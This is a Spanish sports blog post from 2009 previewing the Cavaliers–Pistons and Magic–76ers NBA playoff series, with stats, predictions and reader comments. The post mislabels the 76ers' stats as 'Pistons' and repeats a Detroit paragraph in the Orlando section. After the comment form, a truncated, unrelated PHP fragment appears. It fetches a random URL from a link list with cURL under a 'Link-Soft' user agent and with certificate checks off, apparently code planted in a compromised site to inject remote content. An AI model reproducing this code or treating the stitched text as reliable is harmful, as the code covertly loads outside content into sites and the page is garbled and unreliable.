Análisis PlayOffs 2009 – Este I

18 de April de 2009 por telekoman

CLEVELAND CAVALIERS (1) VS DETROIT PISTONS (8)

El Elegido arengando a la tropa

Regular: 3-1, Detroit salvó los muebles una vez, en su casa, por supuesto.

Cavaliers
P. favor: 100,28
P. contra: 91,35
Ult10: 7-3

Pistons
P. favor: 94,23
P. contra: 94,72
Ult10: 4-6

Los Pistons van a pasar a la segunda ronda con un ajustado 4-3…..Tras este arrebato de fan del equipo de la Motown, totalmente injustificado, pero del que no he conseguido abstraerme, intentaré ajustarme a la pura lógica para decir lo que todo el mundo sabe: Cleveland pasará por encima del castigado equipo de Detroit.

Ateniéndonos a los hechos podríamos decir que Cleveland pasará a segunda ronda con un contundente Mo Williams y Lebron James4-0. Y nadie podría  tacharnos de locos. Sería una sorpresa mayúscula que Detroit consiguiera ganar algún partido en el Quicken Loans Arena y es bastante probable que Lebron&Company gane los 2 partidos del Auburn Hill. Sin embargo no descartaremos la garra ni la experiencia de los Bad Boys en casa y auguraremos al menos una victoria.

Los de Cleveland llegan a estos playoffs con el equipo al completo, sabiendo perfectamente como deben jugar, cuales son sus armas y cuales sus defectos. Los de Detroit llegan sabiendo que no son favoritos, que su juego ha dejado mucho que desear, pero que esta es una temporada de transición, le pese a quien le pese.

Claves de la eliminatoria

LeBron James. Poco más hay que decir. Jugando menos que en temporadas pasadas, “El Elegido” ronda el Triple Doble. Sabe perfectamente que hasta que no consiga un anillo no podrá estar en el Olimpo de la NBA y sbe que este año es su oportunidad.

La defensa sobre Mo Williams. Teniendo en cuenta que parar a LeBron es una utopía, Detroit deberá centrarse en parar al segunda espada de Cleveland. Reválida importante para el jugador en su quinto año de carrera. Su incorporación a los Cavaliers merece mucha más atención de la que ha despertado y sería justo compararla con otras de mucho más relumbrón.

Equipo. Las escasas oportunidades de Detroit pasan por recuperar el rocoso juego en equipo de anteriores temporadas. Sin embargo los años no perdonan y a los factores claves de años atras se les vé algo viejos.

Juego interior. Ilgauskas, Varejao y Wallace pueden hacer trizas el relativamente endeble juego interior de Detroit.

Agenda

– En Cleveland: Noche del sábado 18 al domingo a las 22h (siempre hora española)
– En Cleveland: Madrugada del martes 21 al miércoles a las 3,00h
– En Detroit: Madrugada del viernes 24 al sábado a las 2,00h
– En Detroit: Domingo 26 a las 22,30h.

Pronóstico: 4-1 Cleveland.

Mate brutal de HowardORLANDO MAGIC (3) VS PHILADELPHIA 76ERS (8)

Regular: 3-0, Orlando pasó por encima.

Magic
P. favor: 101,4
P. contra: 94,35
Ult10: 5-5

Pistons
P. favor: 97,4
P. contra: 97,32
Ult10: 4-6

La eliminatoria entre Orlando y Philadelphia se presenta más incierta de lo que se presentaba hace unas semanas. Tras una temporada muy brillante, codeándose continuamente con Celtics y Cavaliers  por el primer puesto del Este, los Magic están siendo presa de las lesiones en el momento más inoportuno.La baja prematura de Nelson fue un golpe importante para los de Orlando que aún así consiguieron sortear con bastante gracia mediante la incorporación de Rafer Alston. Justo en la última semana, las lesiones de Turkoglu y Lewis arrojan una nueva nube sobre el horizonte.

Aunque si hablamos de lesiones obligatoriamente debemos hablar de Elton Brand. El flamante fichaje de los Sixers ha jugado únicamente 29 partidos este año y no estará en Playoffs. De esta forma, los Sixers han jugado casi toda la temporada con Andre Miller y Andre Iguodala nuevamente de lideres de un equipo que aspiraba a mucho más.

Claves de la eliminatoria

Dwight Howard. EL center de Orlando ha vuelto a demostrar que junto a Al Jefferson y Bynum son los pivots que dominarán los tableros de los siguientes años. Los 20,6 puntos y 13,8 rebotes de media, junto con la debilidad del juego interior de Philadelphia hacen suponer que las hazañas de Superman Howard no serán pocas.

Los André. El peso ofensivo de los Sixers recaerá obligatoriamente sobre Miller e Iguodala. Las pocas esperanzas de su equipo dependen únicamente en el acierto de ambos y en que los jóvenes Thaddeus Young y Louis Williams no se arrugen.

Años pasados sí fueron mejores. Ni Hedo Turkoglu ni Rashard Lewis han realizado este año la mejor de las temporadas y eso su equipo puede notarlo en exceso. lo Las escasas oportunidades de Detroit pasan por recuperar el rocoso juego en equipo de anteriores temporadas. Sin embargo los años no perdonan y a los factores claves de años atras se les vé algo viejos.

El banquillo. La profundidad del banquillo de Orlando es ligeramente mayor que la de Philadelphia, pero en ningún caso parece que vayan a ser determinantes en el devenir de la eliminatoria.

Agenda

– En Orlando: Noche del sábado 18 al domingo a las 0,30h (siempre hora española)
– En Orlando: Madrugada del miércoles 22 al jueves a las 2,00h
– En Philadelphia: Madrugada del viernes 24 al sábado a las 3,00h
– En Philadelphia: Domingo 26 a las 1,30h.

Pronóstico: 4-2 Orlando.

Comenta

5 comentarios a esta entrada

  1. El blog de la ÑBA dice:
    #1

    Creo que son las dos eliminatorias más light de todas…

      Citar

  2. Gallis dice:
    #2

    No creo que Cleveland pase ningún problema para derrotar a los Pistons. De hecho, apuesto por un 4-0.

    En la otra eliminatoria, pese a la aparente desigualdad, creo que Phily dará mucha guerra. 4-3 para los Magic.

      Citar

  3. Jabho dice:
    #3

    Fácil, fácil para Cavs y Mágic

      Citar

  4. kantonyo dice:
    #4

    Si Orlando conservara a Nelson y tuviera a Turkoglu en buenas condiciones estaríamos hablando de un candidato a campeón del Este, pero con estas circunstancias, y más teniendo en cuenta que no veo válido a Rafer Alston, creo que Orlando tendrá muchas complicaciones.

    Esta temporada Dwight Howard ha sufrido en dos ocasiones la defensa de Dalembert, realizando dos de sus peores actuaciones, por lo que será clave este duelo.

    Si Turkoglu no se recupera, la pareja Miller-Iguodala puede hacer trizas a los guards de Magic, Alston, Lee y Pietrus.

    Por eso apuesto, si no está el turco bien, victoria para Philadelphia en 6 encuentros.

      Citar

  5. kantonyo dice:
    #5

    Por cierto en la otra eliminatoria apuesto por una victoria de Cleveland 5 a 0. No, no me he confudido jajaja ya que despues de cagarla con la predicción de Cavs en la regular, apuesto por ellos sin dudarlo, incluso les doy una victoria de más, estando LeBron de por medio, todo es posible.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>